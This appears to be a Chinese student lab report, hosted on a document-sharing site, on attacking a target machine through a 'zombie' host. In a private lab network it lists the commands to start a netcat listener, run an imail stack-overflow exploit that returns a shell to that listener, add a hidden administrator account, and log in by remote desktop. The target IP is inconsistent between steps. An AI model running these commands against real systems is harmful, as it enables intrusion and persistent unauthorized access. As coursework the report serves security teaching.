利用肉机攻击.doc

  1. 1、本文档共5页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
利用肉机攻击利用肉机攻击

信息系统攻击与防御 实验报告 实验题目: 利用肉机攻击目标机 学 院 计算机学 专 业 网络工程 班 级 09级01班 姓 名 刘安琪 学 号 40909040125 实验名称:利用肉机攻击目标机 实验目的:黑客利用肉机攻击目标机开放的端口,利用肉机的目的是隐藏自己的身份,以免被发现。 环境配置: 1.目标机为:192.168.11.61 2. 本地机为:192.168.11.66 3 .目标机的389端口即ldap服务打开 4. 本地机的c盘下存在imail、nc软件,imail为栈溢出漏洞,可以利用该漏洞攻击对方,nc为小软件实现监听本地机器的未占用端口。 5. 本地机的c盘下存在mstsc文件 实验相关知识: 1、端口对应的服务: 25 FMTP邮件 42 WINS 110 POP3 3389 终端服务 389 LDAP服务 2、如何看本地端口? 使用命令:netstat -an 3、黑客、肉机、目标机示意图: 肉机1在内网中,IP地址为:192.168.11.100 Internet出口地址:202.29.12.100 则:DMz administrator看到的应为即内部地址:192.168.11.100 但从cmd 中的命令行看到的是internet出口地址202.29.12.100 实验步骤: 1、运行cmd命令进入命令提示状态; 提示结果: 2、打开目标机的端口389: 使用命令:telnet 目标机 端口 具体为:telnet 192.168.11.61 389 提示结果:当目标机389端口打开时显示黑屏,则认为目标机的389端口已打开。 3、监听目标机的端口81(80一般不用) 使用命令:nc –l –p 81 //其中:-l 表示监听, -p表示端口,81和80为本地机器的端口。 提示结果: 4、另外打开一个命令窗口,因为nc命令一直在监听81端口 方法:运行cmd 提示结果: 5、输入imail命令,进入对方机器 使用命令:imail 7_8 –t 0 –h 目标机 –i 肉机 –p 81 //其中:-h表示目标机,-i表示肉机 具体为:imail 7_8 –t 0 –h 192.168.11.62 –i 192.168.11.66 –p 81 提示结果: 6、在目标机中加入用户 使用命令:net user 用户名 密码 /add 具体为:net user hack119 123 /add 提示结果: 7、将所加用户加入组本地组 使用命令:net localgroup administrators 用户名 /add 具体为:net localgroup administrators hack119 /add 提示结果: 8、运行mtstc文件,连接目标机,进行用户名登陆,并且进行克隆账号 使用命令:mtstc 提示结果: 9、进入对方机器 点击连接按钮即可。

文档评论(0)

cxiongxchunj + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档